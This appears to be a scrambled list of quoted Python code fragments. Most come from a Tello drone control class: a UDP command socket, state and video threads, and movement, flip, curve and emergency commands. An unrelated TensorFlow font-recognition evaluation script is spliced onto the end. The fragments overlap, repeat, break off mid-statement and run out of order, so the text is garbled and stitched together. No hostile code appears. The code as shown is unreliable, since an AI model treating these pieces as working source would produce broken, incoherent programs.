with_return=False): \"\"\" param x: int, [20,", "'ok' or 'error' \"\"\" return self.send_command('go {} {} {} {}'.format(x,", "True: ok, frame = self.video.read() if ok: with self.lock: self.frame", "raise RuntimeError('Video is not available') while self.video_client.empty(): pass return self.video_client.pop()", "def empty(self): return self.response.empty() def pop(self): return self.response.pop() class Video(object):", "500] param z1, z2: int, [-500, 500] param speed: int,", "param up_down_velocity: int, [-100, 100] param rotate_velocity: int, [-100, 100]", "{}'.format(x, y, z, speed), with_return) def goto_curve(self, x1, y1, z1,", "100] \"\"\" return self.get('battery?') def get_flight_time(self): \"\"\" return: int \"\"\"", "None if video: self.open_video_stream() self.video_client = Video(True) def send_command(self, command,", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('right", "bool return: 'ok' or 'error' \"\"\" return self.send_command('flip f', with_return)", "def goto_curve(self, x1, y1, z1, x2, y2, z2, speed, with_return=False):", "= cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened(): raise RuntimeError('Failed to connect to", "ok, frame = self.video.read() if ok: with self.lock: self.frame =", "the Tello rejects the attempt to enter command mode or", "self.frame, None return frame class Tello(object): def __init__(self, local_port=9999, command_timeout=0.35,", "defined by (0, 0, 0), (x1, y1, z1), (x2, y2,", "socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens for responses from the Tello.", "self.response = {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if ':' in", "from Tello. Raises: RuntimeError: If no response is received within", "x2, y2, z2, speed, with_return=False): \"\"\"fly a curve defined by", "def recv(self, data): with self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1]) for item", "empty(self): with self.lock: return self.response is None class State(Response): def", "frame def empty(self): with self.lock: return self.frame is None def", "speed), with_return) def goto_curve(self, x1, y1, z1, x2, y2, z2,", "int, [-500, 500] param y1, y2: int, [-500, 500] param", "super(Command, self).__init__() self.response = None self.lock = threading.RLock() def recv(self,", "'error' \"\"\" return self.send_command('go {} {} {} {}'.format(x, y, z,", "Video(object): def __init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened():", "bool return: 'ok' or 'error' \"\"\" return self.send_command('speed {}'.format(speed), with_return)", "= Client(8890, 1024, True, State()) if state else None self.tello_address", "def open_video_stream(self): if self.send_command('streamon') != 'ok': raise RuntimeError('Tello rejected to", "emergency_shutdown(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('emergency') def", "{}'.format(x), with_return) def move_down(self, x, with_return=False): \"\"\" param x: int,", "None self.lock = threading.RLock() def recv(self, data): with self.lock: self.response", "move_left(self, x, with_return=False): \"\"\" param x: int, [20, 500] param", "if self.video_client is None: raise RuntimeError('Video is not available') while", "or 'error' \"\"\" return self.send_command('back {}'.format(x), with_return) def rotate_clockwise(self, x,", "'ok' or 'error' \"\"\" return self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self,", "return: int, [0, 100] \"\"\" return self.get('battery?') def get_flight_time(self): \"\"\"", "self.frame = None self.lock = threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon", "with_return=False): \"\"\" param left_right_velocity: int, [-100, 100] param forward_backward_velocity: int,", "def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects to Tello in", "thread, sets self.response to whatever the Tello last returned. \"\"\"", "y1, z1), (x2, y2, z2) with speed param x1, x2:", "get_temperature(self): \"\"\" return: int, [0, 90] \"\"\" return self.get('temp?') def", "self.response_client = Client(local_port, 1024, True, Command()) self.state_client = Client(8890, 1024,", "int, [0, 100] \"\"\" return self.get('battery?') def get_flight_time(self): \"\"\" return:", "daemon self.receive_thread.start() def __del__(self): \"\"\"Closes the local socket.\"\"\" self.socket.close() def", "= self.video.read() if ok: with self.lock: self.frame = frame def", "return: list(int), [[-89, 89], [-179, 179], [-179, 179]] \"\"\" return", "self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return: return st = time.time()", "while self.response_client.empty(): if time.time() - st >= self.command_timeout: raise RuntimeError('No", "def flip_left(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or", "forward_backward_velocity: int, [-100, 100] param up_down_velocity: int, [-100, 100] param", "return self.send_command('cw {}'.format(x), with_return) def rotate_counter_clockwise(self, x, with_return=False): \"\"\" param", "or 'error' \"\"\" return self.send_command('emergency') def move_up(self, x, with_return=False): \"\"\"", "[10, 3000] \"\"\" return self.get('height?') def get_temperature(self): \"\"\" return: int,", "'error' \"\"\" return self.send_command('right {}'.format(x), with_return) def move_forward(self, x, with_return=False):", "\"\"\" return self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity,", "y2, z2) with speed param x1, x2: int, [-500, 500]", "def empty(self): with self.lock: return self.response is None class State(Response):", "rotate_counter_clockwise(self, x, with_return=False): \"\"\" param x: int, [1, 3600] param", "return: 'ok' or 'error' \"\"\" return self.send_command('flip r', with_return) def", "\"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('takeoff') def land(self):", "\"\"\"fly a curve defined by (0, 0, 0), (x1, y1,", "bool return: 'ok' or 'error' \"\"\" return self.send_command('go {} {}", "None class State(Response): def __init__(self): super(State, self).__init__() self.response = {}", "bool return: 'ok' or 'error' \"\"\" return self.send_command('right {}'.format(x), with_return)", "RuntimeError exception is raised. Args: command (str): Command to send.", "to the Tello and waits for a response. If self.command_timeout", "return self.get('time?') def get_relative_height(self): \"\"\" return: int, [10, 3000] \"\"\"", "True: try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception as e: print(e) break def", "self.send_command('command') != 'ok': raise RuntimeError('Tello rejected the attempt to enter", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('down", "\"\"\" param x: int, [1, 3600] param with_return: bool return:", "\"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('land') def open_video_stream(self):", "def get_flight_time(self): \"\"\" return: int \"\"\" return self.get('time?') def get_relative_height(self):", "__init__(self): super(Command, self).__init__() self.response = None self.lock = threading.RLock() def", "self.send_command('up {}'.format(x), with_return) def move_down(self, x, with_return=False): \"\"\" param x:", "move_backward(self, x, with_return=False): \"\"\" param x: int, [20, 500] param", "rejected to open the video stream') def close_video_stream(self): \"\"\" return:", "forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False): \"\"\" param left_right_velocity: int, [-100, 100]", "\"\"\"Closes the local socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens for responses", "cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened(): raise RuntimeError('Failed to connect to Tello')", "return self.send_command('left {}'.format(x), with_return) def move_right(self, x, with_return=False): \"\"\" param", "'ok' or 'error' \"\"\" return self.send_command('forward {}'.format(x), with_return) def move_backward(self,", "\"\"\" return self.send_command('right {}'.format(x), with_return) def move_forward(self, x, with_return=False): \"\"\"", "{} {} {}'.format(x, y, z, speed), with_return) def goto_curve(self, x1,", "split=False): \"\"\" param command param split: bool, multiple values? return:", "get_absolute_height(self): \"\"\" return: int \"\"\" return self.get('baro?') def get_imu_acceleration(self): \"\"\"", "self.send_command('cw {}'.format(x), with_return) def rotate_counter_clockwise(self, x, with_return=False): \"\"\" param x:", "is None def pop(self): with self.lock: frame, self.frame = self.frame,", "return: 'ok' or 'error' \"\"\" return self.send_command('cw {}'.format(x), with_return) def", "x: int, [1, 3600] param with_return: bool return: 'ok' or", "= daemon self.receive_thread.start() def __del__(self): \"\"\"Closes the local socket.\"\"\" self.socket.close()", "= Video(True) def send_command(self, command, with_return=True): \"\"\"Sends a command to", "self.send_command(command) if split: return [int(x) for x in result.split(' ')]", "with speed param x1, x2: int, [-500, 500] param y1,", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('down {}'.format(x),", "z2, speed), with_return) def set_speed(self, speed, with_return=False): \"\"\" param speed:", "self).__init__() self.response = None self.lock = threading.RLock() def recv(self, data):", "Tello last returned. \"\"\" while True: try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception", "= threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start() def __del__(self): \"\"\"Closes the", "threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start() def __del__(self): \"\"\"Closes the local", "st = time.time() while self.response_client.empty(): if time.time() - st >=", "def rotate_clockwise(self, x, with_return=False): \"\"\" param x: int, [1, 3600]", "bool return: 'ok' or 'error' \"\"\" return self.send_command('flip l', with_return)", "179]] \"\"\" return self.get('attitude?', split=True) def get_absolute_height(self): \"\"\" return: int", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('flip r',", "'ok' or 'error' \"\"\" return self.send_command('back {}'.format(x), with_return) def rotate_clockwise(self,", "enter command mode') def take_off(self): \"\"\" return: 'ok' or 'error'", "return self.get('height?') def get_temperature(self): \"\"\" return: int, [0, 90] \"\"\"", "param x: int, [20, 500] param with_return: bool return: 'ok'", "print(e) break def empty(self): return self.response.empty() def pop(self): return self.response.pop()", "connect to Tello') self.frame = None self.lock = threading.RLock() self.thread", "def move_up(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "y: int, [20, 500] param z: int, [20, 500] param", "return: int, [10, 400]; 6553: out of bounds \"\"\" return", "def recv(self, data): with self.lock: self.response = data.decode('utf-8') def pop(self):", "'error' \"\"\" return self.send_command('rc {} {} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity,", "'error' \"\"\" return self.send_command('flip r', with_return) def flip_forward(self, with_return=False): \"\"\"", "RuntimeError('Failed to connect to Tello') self.frame = None self.lock =", "def send_command(self, command, with_return=True): \"\"\"Sends a command to the Tello", "z: int, [20, 500] param speed: int, [10-100] param with_return:", "speed, with_return=False): \"\"\" param speed: int, [10-100] param with_return: bool", "for a response of command. state (bool): receive state from", "= socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('', local_port)) self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon =", "if not self.video.isOpened(): raise RuntimeError('Failed to connect to Tello') self.frame", "empty(self): pass class Command(Response): def __init__(self): super(Command, self).__init__() self.response =", "available') while self.video_client.empty(): pass return self.video_client.pop() def enter_command_mode(self): if self.send_command('command')", "self.lock: self.frame = frame def empty(self): with self.lock: return self.frame", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('left", "RuntimeError('Tello rejected to open the video stream') def close_video_stream(self): \"\"\"", "f', with_return) def flip_backward(self, with_return=False): \"\"\" param with_return: bool return:", "{} {} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def get(self,", "x2, y2, z2, speed), with_return) def set_speed(self, speed, with_return=False): \"\"\"", "\"\"\" return self.send_command('ccw {}'.format(x), with_return) def flip_left(self, with_return=False): \"\"\" param", "def pop(self): return self.response def empty(self): return False class Client(object):", "'error' \"\"\" return self.send_command('up {}'.format(x), with_return) def move_down(self, x, with_return=False):", "self.lock: self.response = data.decode('utf-8') def pop(self): with self.lock: response, self.response", "bool, multiple values? return: int or list(int) \"\"\" result =", "def empty(self): return False class Client(object): def __init__(self, local_port, buffer_size,", "def _update_thread(self): while True: ok, frame = self.video.read() if ok:", "\"\"\" return: int, [10, 400]; 6553: out of bounds \"\"\"", "return: int \"\"\" return self.get('time?') def get_relative_height(self): \"\"\" return: int,", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('cw", "'error' \"\"\" return self.send_command('ccw {}'.format(x), with_return) def flip_left(self, with_return=False): \"\"\"", "'ok' or 'error' \"\"\" return self.send_command('flip b', with_return) def goto(self,", "[int(x) for x in result.split(' ')] else: return int(result) def", "to whatever the Tello last returned. \"\"\" while True: try:", "with_return) def flip_forward(self, with_return=False): \"\"\" param with_return: bool return: 'ok'", "to wait for a response of command. state (bool): receive", "None self.tello_address = ('192.168.10.1', 8889) self.enter_command_mode() self.video_client = None if", "self.get('baro?') def get_imu_acceleration(self): \"\"\" return: list(int) \"\"\" return self.get('acceleration?', split=True)", "class Tello(object): def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects to", "x: int, [20, 500] param y: int, [20, 500] param", "command to the Tello and waits for a response. If", "return self.send_command('up {}'.format(x), with_return) def move_down(self, x, with_return=False): \"\"\" param", "to enter command mode or open the video stream. \"\"\"", "mode or open the video stream. \"\"\" self.command_timeout = command_timeout", "as e: print(e) break def empty(self): return self.response.empty() def pop(self):", "a RuntimeError exception is raised. Args: command (str): Command to", "(0, 0, 0), (x1, y1, z1), (x2, y2, z2) with", "the Tello and waits for a response. If self.command_timeout is", "frame = self.video.read() if ok: with self.lock: self.frame = frame", "state(self): return self.state_client.pop() if self.state_client else None def read_frame(self): if", "[1, 3600] param with_return: bool return: 'ok' or 'error' \"\"\"", "def pop(self): with self.lock: frame, self.frame = self.frame, None return", "or 'error' \"\"\" return self.send_command('flip f', with_return) def flip_backward(self, with_return=False):", "return: 'ok' or 'error' \"\"\" return self.send_command('down {}'.format(x), with_return) def", "self.video_client.empty(): pass return self.video_client.pop() def enter_command_mode(self): if self.send_command('command') != 'ok':", "z2: int, [-500, 500] param speed: int, [10-60] param with_return:", "8889) self.enter_command_mode() self.video_client = None if video: self.open_video_stream() self.video_client =", "\"\"\" param x: int, [20, 500] param with_return: bool return:", "def state(self): return self.state_client.pop() if self.state_client else None def read_frame(self):", "is received within self.timeout seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if", "self.send_command('land') def open_video_stream(self): if self.send_command('streamon') != 'ok': raise RuntimeError('Tello rejected", "return: 'ok' or 'error' \"\"\" return self.send_command('speed {}'.format(speed), with_return) def", "is raised. Args: command (str): Command to send. Returns: str:", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('flip b',", "If self.command_timeout is exceeded before a response is received, a", "\"\"\" return self.send_command('flip l', with_return) def flip_right(self, with_return=False): \"\"\" param", "Tello. Runs as a thread, sets self.response to whatever the", "speed, with_return=False): \"\"\"fly a curve defined by (0, 0, 0),", "left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False): \"\"\" param left_right_velocity: int, [-100,", "param z1, z2: int, [-500, 500] param speed: int, [10-60]", "frame class Tello(object): def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects", "bool return: 'ok' or 'error' \"\"\" return self.send_command('up {}'.format(x), with_return)", "= buffer_size self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('', local_port)) self.receive_thread =", "z1, x2, y2, z2, speed, with_return=False): \"\"\"fly a curve defined", "y2: int, [-500, 500] param z1, z2: int, [-500, 500]", "1024, True, State()) if state else None self.tello_address = ('192.168.10.1',", "500] param y1, y2: int, [-500, 500] param z1, z2:", "Tello. Raises: RuntimeError: If no response is received within self.timeout", "mode') def take_off(self): \"\"\" return: 'ok' or 'error' \"\"\" return", "int, [-500, 500] param speed: int, [10-60] param with_return: bool", "x1, y1, z1, x2, y2, z2, speed, with_return=False): \"\"\"fly a", "pop(self): with self.lock: frame, self.frame = self.frame, None return frame", "open the video stream. \"\"\" self.command_timeout = command_timeout self.response_client =", "return self.state_client.pop() if self.state_client else None def read_frame(self): if self.video_client", "self.response_client.pop() def state(self): return self.state_client.pop() if self.state_client else None def", "with_return: return st = time.time() while self.response_client.empty(): if time.time() -", "Tello rejects the attempt to enter command mode or open", "__init__(self): super(State, self).__init__() self.response = {} self.lock = threading.RLock() def", "def land(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('land')", "self.socket.bind(('', local_port)) self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start() def", "threading.RLock() def recv(self, data): with self.lock: self.response = data.decode('utf-8') def", "[-100, 100] param forward_backward_velocity: int, [-100, 100] param up_down_velocity: int,", "with self.lock: self.frame = frame def empty(self): with self.lock: return", "int, [-100, 100] param with_return: bool return: 'ok' or 'error'", "{} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def get(self, command, split=False):", "rotate_clockwise(self, x, with_return=False): \"\"\" param x: int, [1, 3600] param", "receive state from Tello? video (bool): receive video from Tello?", "self.open_video_stream() self.video_client = Video(True) def send_command(self, command, with_return=True): \"\"\"Sends a", "pop(self): return self.response.pop() class Video(object): def __init__(self, daemon=True): self.video =", "param z: int, [20, 500] param speed: int, [10-100] param", "read_frame(self): if self.video_client is None: raise RuntimeError('Video is not available')", "int, [-100, 100] param up_down_velocity: int, [-100, 100] param rotate_velocity:", "if ':' in item} def pop(self): return self.response def empty(self):", "video: self.open_video_stream() self.video_client = Video(True) def send_command(self, command, with_return=True): \"\"\"Sends", "{}'.format(x), with_return) def move_forward(self, x, with_return=False): \"\"\" param x: int,", "__del__(self): \"\"\"Closes the local socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens for", "or 'error' \"\"\" return self.send_command('ccw {}'.format(x), with_return) def flip_left(self, with_return=False):", "yaw] return: list(int), [[-89, 89], [-179, 179], [-179, 179]] \"\"\"", "with_return=False): \"\"\" param speed: int, [10-100] param with_return: bool return:", "= command_timeout self.response_client = Client(local_port, 1024, True, Command()) self.state_client =", "int, [-100, 100] param forward_backward_velocity: int, [-100, 100] param up_down_velocity:", "or 'error' \"\"\" return self.send_command('left {}'.format(x), with_return) def move_right(self, x,", "= response self.buffer_size = buffer_size self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('',", "= data.decode('utf-8') def pop(self): with self.lock: response, self.response = self.response,", "with self.lock: frame, self.frame = self.frame, None return frame class", "from the Tello. Runs as a thread, sets self.response to", "self.send_command('takeoff') def land(self): \"\"\" return: 'ok' or 'error' \"\"\" return", "{} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def get(self, command,", "'error' \"\"\" return self.send_command('curve {} {} {} {} {} {}", "the video stream. \"\"\" self.command_timeout = command_timeout self.response_client = Client(local_port,", "\"\"\" return self.send_command('flip b', with_return) def goto(self, x, y, z,", "y, z, speed, with_return=False): \"\"\" param x: int, [20, 500]", "speed, with_return=False): \"\"\" param x: int, [20, 500] param y:", "\"\"\" return self.send_command('down {}'.format(x), with_return) def move_left(self, x, with_return=False): \"\"\"", "import threading class Response(object): def __init__(self): pass def recv(self, data):", "'ok' or 'error' \"\"\" return self.send_command('ccw {}'.format(x), with_return) def flip_left(self,", "\"\"\" return self.send_command('rc {} {} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity),", "Returns: str: Response from Tello. Raises: RuntimeError: If no response", "\"\"\" return self.send_command('takeoff') def land(self): \"\"\" return: 'ok' or 'error'", "return: 'ok' or 'error' \"\"\" return self.send_command('back {}'.format(x), with_return) def", "a thread, sets self.response to whatever the Tello last returned.", "self.video_client.pop() def enter_command_mode(self): if self.send_command('command') != 'ok': raise RuntimeError('Tello rejected", "state else None self.tello_address = ('192.168.10.1', 8889) self.enter_command_mode() self.video_client =", "take_off(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('takeoff') def", "self.state_client.pop() if self.state_client else None def read_frame(self): if self.video_client is", "a curve defined by (0, 0, 0), (x1, y1, z1),", "response, self.response = self.response, None return response def empty(self): with", "{} {}'.format(x, y, z, speed), with_return) def goto_curve(self, x1, y1,", "pass return self.video_client.pop() def enter_command_mode(self): if self.send_command('command') != 'ok': raise", "\"\"\" return self.get('baro?') def get_imu_acceleration(self): \"\"\" return: list(int) \"\"\" return", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('left {}'.format(x),", "self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False):", "with_return) def set_speed(self, speed, with_return=False): \"\"\" param speed: int, [10-100]", "Client(object): def __init__(self, local_port, buffer_size, daemon, response): self.response = response", "item} def pop(self): return self.response def empty(self): return False class", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('speed {}'.format(speed),", "self.command_timeout is exceeded before a response is received, a RuntimeError", "\"\"\" return self.get('time?') def get_relative_height(self): \"\"\" return: int, [10, 3000]", "self.response is None class State(Response): def __init__(self): super(State, self).__init__() self.response", "z2, speed, with_return=False): \"\"\"fly a curve defined by (0, 0,", "[0, 90] \"\"\" return self.get('temp?') def get_imu_pose(self): \"\"\"[pitch, roll, yaw]", "raise RuntimeError('Failed to connect to Tello') self.frame = None self.lock", "\"\"\" return self.send_command('land') def open_video_stream(self): if self.send_command('streamon') != 'ok': raise", "self.send_command('rc {} {} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def", "to connect to Tello') self.frame = None self.lock = threading.RLock()", "= self.send_command(command) if split: return [int(x) for x in result.split('", "to send. Returns: str: Response from Tello. Raises: RuntimeError: If", "speed: int, [10-60] param with_return: bool return: 'ok' or 'error'", "\"\"\" return self.send_command('curve {} {} {} {} {} {} {}'.format(x1,", "'ok' or 'error' \"\"\" return self.send_command('left {}'.format(x), with_return) def move_right(self,", "self.send_command('go {} {} {} {}'.format(x, y, z, speed), with_return) def", "stream') def close_video_stream(self): \"\"\" return: 'ok' or 'error' \"\"\" return", "self.lock: frame, self.frame = self.frame, None return frame class Tello(object):", "roll, yaw] return: list(int), [[-89, 89], [-179, 179], [-179, 179]]", "response is received within self.timeout seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address)", "{}'.format(x1, y1, z1, x2, y2, z2, speed), with_return) def set_speed(self,", "Tello in command mode. Args: local_port (int): port of local", "__init__(self, local_port, buffer_size, daemon, response): self.response = response self.buffer_size =", "(float): seconds to wait for a response of command. state", "\"\"\" return: int, [0, 100] \"\"\" return self.get('battery?') def get_flight_time(self):", "self.send_command('flip b', with_return) def goto(self, x, y, z, speed, with_return=False):", "left_right_velocity: int, [-100, 100] param forward_backward_velocity: int, [-100, 100] param", "[20, 500] param with_return: bool return: 'ok' or 'error' \"\"\"", "split=True) def get_absolute_height(self): \"\"\" return: int \"\"\" return self.get('baro?') def", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('flip", "response def empty(self): with self.lock: return self.response is None class", "speed: int, [10-100] param with_return: bool return: 'ok' or 'error'", "(str): Command to send. Returns: str: Response from Tello. Raises:", "param x1, x2: int, [-500, 500] param y1, y2: int,", "is None: raise RuntimeError('Video is not available') while self.video_client.empty(): pass", "local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects to Tello in command mode.", "= threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start() def __del__(self): self.video.release() def", "return self.send_command('emergency') def move_up(self, x, with_return=False): \"\"\" param x: int,", "= threading.RLock() def recv(self, data): with self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1])", "return int(result) def get_speed(self): \"\"\" return: int, [10, 100] \"\"\"", "\"\"\" param with_return: bool return: 'ok' or 'error' \"\"\" return", "class Client(object): def __init__(self, local_port, buffer_size, daemon, response): self.response =", "int or list(int) \"\"\" result = self.send_command(command) if split: return", "(x2, y2, z2) with speed param x1, x2: int, [-500,", "pass def empty(self): pass class Command(Response): def __init__(self): super(Command, self).__init__()", "500] param y: int, [20, 500] param z: int, [20,", "data): pass def pop(self): pass def empty(self): pass class Command(Response):", "self.response def empty(self): return False class Client(object): def __init__(self, local_port,", "goto(self, x, y, z, speed, with_return=False): \"\"\" param x: int,", "rejects the attempt to enter command mode or open the", "or 'error' \"\"\" return self.send_command('cw {}'.format(x), with_return) def rotate_counter_clockwise(self, x,", "return: 'ok' or 'error' \"\"\" return self.send_command('flip f', with_return) def", "\"\"\" return: int, [0, 90] \"\"\" return self.get('temp?') def get_imu_pose(self):", "def get_relative_height(self): \"\"\" return: int, [10, 3000] \"\"\" return self.get('height?')", "exception is raised. Args: command (str): Command to send. Returns:", "100] \"\"\" return self.get('speed?') def get_battery(self): \"\"\" return: int, [0,", "get(self, command, split=False): \"\"\" param command param split: bool, multiple", "return response def empty(self): with self.lock: return self.response is None", "'error' \"\"\" return self.send_command('cw {}'.format(x), with_return) def rotate_counter_clockwise(self, x, with_return=False):", "param speed: int, [10-60] param with_return: bool return: 'ok' or" ]
[ "UTC) # # For imports without namespace, e.g. # #", "<filename>terrascript/resource/sematext.py # terrascript/resource/sematext.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36", "namespace, e.g. # # >>> import terrascript.resource.sematext # # instead", "# This is only available for 'official' and 'partner' providers.", "tools/makecode.py (24-Sep-2021 15:26:36 UTC) # # For imports without namespace,", "e.g. # # >>> import terrascript.resource.sematext # # instead of", "This is only available for 'official' and 'partner' providers. from", "# # For imports without namespace, e.g. # # >>>", "is only available for 'official' and 'partner' providers. from terrascript.resource.sematext.sematext", "without namespace, e.g. # # >>> import terrascript.resource.sematext # #", "# terrascript/resource/sematext.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC)", "# Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC) # #", "imports without namespace, e.g. # # >>> import terrascript.resource.sematext #", "# instead of # # >>> import terrascript.resource.sematext.sematext # #", "terrascript.resource.sematext # # instead of # # >>> import terrascript.resource.sematext.sematext", "# # >>> import terrascript.resource.sematext # # instead of #", "terrascript/resource/sematext.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC) #", "instead of # # >>> import terrascript.resource.sematext.sematext # # This", ">>> import terrascript.resource.sematext.sematext # # This is only available for", "(24-Sep-2021 15:26:36 UTC) # # For imports without namespace, e.g.", "# # This is only available for 'official' and 'partner'", "# >>> import terrascript.resource.sematext.sematext # # This is only available", "Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC) # # For", "# # instead of # # >>> import terrascript.resource.sematext.sematext #", "by tools/makecode.py (24-Sep-2021 15:26:36 UTC) # # For imports without", "terrascript.resource.sematext.sematext # # This is only available for 'official' and", "# # >>> import terrascript.resource.sematext.sematext # # This is only", "available for 'official' and 'partner' providers. from terrascript.resource.sematext.sematext import *", "import terrascript.resource.sematext.sematext # # This is only available for 'official'", "# For imports without namespace, e.g. # # >>> import", "import terrascript.resource.sematext # # instead of # # >>> import", "For imports without namespace, e.g. # # >>> import terrascript.resource.sematext", ">>> import terrascript.resource.sematext # # instead of # # >>>", "# >>> import terrascript.resource.sematext # # instead of # #", "of # # >>> import terrascript.resource.sematext.sematext # # This is", "generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC) # # For imports", "15:26:36 UTC) # # For imports without namespace, e.g. #", "only available for 'official' and 'partner' providers. from terrascript.resource.sematext.sematext import" ]
[ "numpy as np import os, time, csv import tqdm import", "eval(self): self.data = net.FontData() print(\"Plot: \", self.init_epoch + 1) acc", "plt.close('all') return acc def eval(): encoder = SimpleEncodeDecoder() encoder.eval() if", "txt.write('accuracy = %f\\n'%acc) result = np.concatenate(result) labels = np.concatenate(labels) print('run", "correct_count / (correct_count + failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) txt.write('Failed", "pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target == predid: txt.write('Correct!\\n') correct_count +=", "model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir,", "= inputs['index'] target_id1 = inputs['idx1'] target_id2 = inputs['idx2'] pred_id1 =", "pred_id2, 'target_id': target_id, 'target_id1': target_id1, 'target_id2': target_id2, } def make_plot(self,", "self.decoder(feature) target_id = inputs['index'] target_id1 = inputs['idx1'] target_id2 = inputs['idx2']", "exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch = 300 self.steps_per_epoch = 1000", "CJK JP'] import net class SimpleEncodeDecoder: def __init__(self): self.save_dir =", "= self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc', acc) @tf.function def eval_substep(self,", "= self.encoder(inputs) outputs = self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder')", "1 else: txt.write('Failed!\\n') failed_count += 1 pbar.update(1) acc = correct_count", "'IPAPGothic', 'Noto Sans CJK JP'] import net class SimpleEncodeDecoder: def", "python3 import tensorflow as tf physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0],", "1)) print('acc', acc) @tf.function def eval_substep(self, inputs): input_data = {", "last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2)", "= './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch = 300", "= tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager(", "= [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count = 0 failed_count", "net.SimpleDecoderBlock() self.decoder.summary() inputs = { 'image': tf.keras.Input(shape=(128,128,3)), } feature_out =", "os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch = 300 self.steps_per_epoch =", "def eval(self): self.data = net.FontData() print(\"Plot: \", self.init_epoch + 1)", "net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs = { 'image':", "= { 'image': inputs['input'], } feature = self.encoder(input_data) outputs =", "ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv'))", "target_id, 'target_id1': target_id1, 'target_id2': target_id2, } def make_plot(self, 